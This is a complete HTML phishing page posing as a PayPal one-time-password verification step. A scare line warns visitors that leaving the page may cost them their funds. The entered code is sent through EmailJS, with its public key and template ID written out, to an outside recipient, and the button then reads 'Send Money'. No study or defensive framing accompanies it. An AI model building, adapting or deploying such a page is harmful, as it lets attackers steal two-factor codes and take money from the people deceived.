<!DOCTYPE html>

<html>
<head>
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
 
  <meta http-equiv="CONTENT-TYPE" content="text/html; charset=UTF-8">
  <title>OTP VERIFICATION</title>
</head>
<style>

body {
  font-family: Arial, sans-serif;
  background-color: #fff;
  margin: 0;
  padding: 0;
}
.container {
  width: 400px;
  margin: 50px auto;
  background-color: #fff;
  padding: 20px;
  border: 1px solid #ddd;
  border-radius: 10px;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}
.field {
  margin-bottom: 20px;
}
label {
  display: block;
  margin-bottom: 10px;
  font-weight: bold;
  color:#FFA07A ;
  text-align:center;
}
input[type="text"] {
  width: 100%;
  height: 40px;
  padding: 10px;
  border: 1px solid #ccc;
  border-radius: 20px;
  background-color: #f7f7f7;
  font-size: 18px;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}
input[type="text"]:focus {
  outline: none;
  border: 1px solid #FFA07A;
  box-shadow: 0 0 10px rgba(255, 160, 122, 0.5);
}
input[type="submit"] {
  width: 150px;
  height: 40px;
  padding: 10px;
  background-color: #FFA07A;
  color: #fff;
  border: none;
  border-radius: 20px;
  cursor: pointer;
  font-size: 18px;
  margin: 0 auto;
  display: block;
}
input[type="submit"]:hover {
  background-color: #FF8C69;
}
h3 {
  color:black;
  text-align:center;
}
h2 {
  color:black;
  text-align:center;
}
</style>

<body>
<form id="form">
  <h2>OTP INPUT</h2>
  <h3>Do not exit this page <b>it may lead to the loss of your funds</b></h3>
  <div class="field">
    <label for="from_name">You will get an otp "One time passwors" using the paypal gateway </label>
    <input type="text" name="from_name" id="from_name" required="">
  </div>


  <input type="submit" id="button" value="Submit otp" >
</form>

<script type="text/javascript"
  src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>

<script type="text/javascript">
  emailjs.init('Cwf3anlcdWQ1Yq1n5')
</script>
  <script>
  
const btn = document.getElementById('button');
document.getElementById('form')
.addEventListener('submit', function(event) {
  event.preventDefault();
  btn.value = 'Sending...';
  const serviceID = 'default_service';
  const templateID = 'template_8t2k7cp';
  emailjs.sendForm(serviceID, templateID, this)
  .then(() => {
    btn.value = 'Send Money';
    alert('Sent!');
    window.location.href = 'success.html';
  }, (err) => {
    btn.value = 'Send Money';
    alert(JSON.stringify(err));
  });
});

  </script>
</body>
</html>
